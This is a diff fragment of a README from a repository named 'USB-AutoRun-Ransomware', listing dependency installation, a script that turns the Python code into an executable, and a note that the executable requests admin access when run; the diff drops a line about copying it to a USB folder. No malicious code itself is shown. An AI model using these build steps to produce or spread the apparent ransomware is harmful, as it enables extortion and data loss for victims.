SulaimanNiazi/USB-AutoRun-Ransomware/README.md

 - `tkinter` (usually included with Python on Windows)

 Install dependencies:

 ```bash
 pip install -r requirements.txt
 ```

 To create an executable:

 ```bash
 python convert_py_to_exe.py
 ```

-The `.exe` will appear in the `dist` folder, and will be copied to the `USB` folder.
+The `.exe` will appear in the `dist` folder.
 When run, it will request admin access automatically.

 ---